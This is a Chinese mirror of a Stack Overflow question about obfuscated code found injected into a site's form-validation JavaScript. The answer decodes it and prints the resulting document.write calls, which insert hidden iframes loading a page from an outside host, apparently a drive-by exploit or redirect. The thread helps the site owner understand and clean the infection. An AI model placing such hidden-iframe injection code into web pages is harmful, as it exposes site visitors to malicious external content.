javascript - 在我的 javascript 文件中发现的这个奇怪代码是什么?

标签 javascript virus

<分区>

我的一个表单验证文件,我发现了以下代码(见下文) 我的 friend 在扫描我的网站时指出了它,说它是病毒。

但它到底是什么?

http://pastebin.com/P8KBm0xk

最佳答案

一种病毒。我在数组文字中包含一些带有 Unicode 转义字符的字符串,第一个是一些 html,第二个是 "write"。然后,执行 document[arr[1]](arr[0]),转换为以下内容:

document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');
document.write('<div name="youtube" style="display:none"><iframe width="560" height="315" src="evil://mazda.georgewkohn.com/direct.php?page=15f48be84d67654d" frameborder="0" allowfullscreen></iframe></div>');

我不知道(也不会检查)这些 iframe 包含什么,可能会有一些漏洞利用。

此外,代码确实包含(在这两个 iframe 写入之间)一些函数(_1lOO0l),这些函数可能会转义 IlO string 在 evaled 之前(是的,eval 是邪恶的!:-),但是在你的 pastebin 片段前面有一些缺失的代码,所以我无法告诉你它们到底是什么做。你能给我们完整的剧本吗?

关于javascript - 在我的 javascript 文件中发现的这个奇怪代码是什么?,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/11820540/

上一篇:javascript - 是否可以通过 JavaScript 中的浏览器确定操作系统中设置的用户区域设置的**国家/地区**?

下一篇:javascript - Jquery 的恶意软件脚本

相关文章:

javascript - 如何在angularjs中将li标签附加到ul中?

networking - 嗅探网络流量以寻找病毒/ spy 软件的迹象

php - 在 PHP 文件中注入(inject)病毒代码

machine-learning - 有没有办法从给定的恶意软件二进制文件中找到恶意软件家族?

javascript - 以编程方式将 3-D 形状添加到必应 map (虚拟地球)

javascript - 如何在 ReactJS 中分离两个函数?

javascript - 在javascript中绘制分形?

PHP 脚本 : malicious JavaScript code at the end

redirect - 我的网站 google 搜索链接被重定向到一些未知网站

javascript - 简单日期差异代码

©2024 IT工具网  联系我们